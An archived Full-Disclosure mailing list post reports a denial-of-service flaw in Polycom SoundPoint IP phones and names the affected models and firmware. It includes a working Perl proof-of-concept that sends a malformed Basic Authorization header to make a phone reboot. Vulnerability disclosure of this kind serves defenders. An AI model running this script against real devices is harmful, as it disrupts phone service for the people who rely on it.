[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Polycom SoundPoint IP DoS

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Polycom SoundPoint IP DoS
From: Pawel Gawinek <harston@xxxxxxx>
Date: Thu, 27 Jan 2011 02:21:52 +0100

Hello,

Polycom SoundPoint IP devices (IP phones) are vulnerable to Denial of 
Service attacks. Sending HTTP GET request with broken Authorization 
header effect a device restart after ~60 seconds.

It was tested on:

SoundPoint IP 335 (Version: 3.2.4.1734)
SoundPoint IP 430 (Version: 3.2.3.1734)
SoundPoint IP 450 (Version: 4.2.2.0710)

Proof Of Concept:
-----------------------------------------
#!/usr/bin/perl

use IO::Socket;
use strict;
use warnings;

if (!$ARGV[0]) {
         print "Usage: $0 [IP]\n";
         exit;
}

my $socket = IO::Socket::INET->new(
         Proto => "tcp",
         PeerAddr => "$ARGV[0]",
         PeerPort => "80") || die "Error $!";


print $socket "GET /reg_1.htm HTTP/1.1\r\nAuthorization: Basic\r\n\r\n";
#print $socket "GET /reg_1.htm HTTP/1.1\r\nAuthorization: Basic \0\r\n\r\n";
-----------------------------------------

-- 
best regards
pawel gawinek

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] http://security.goatse.fr/gaping-hole-exposed
Next by Date: Re: [Full-disclosure] www.google.com xss vulnerability Using mhtml
Previous by thread: Re: [Full-disclosure] http://security.goatse.fr/gaping-hole-exposed
Next by thread: [Full-disclosure] In Pro Domo
Index(es):
- Date
- Thread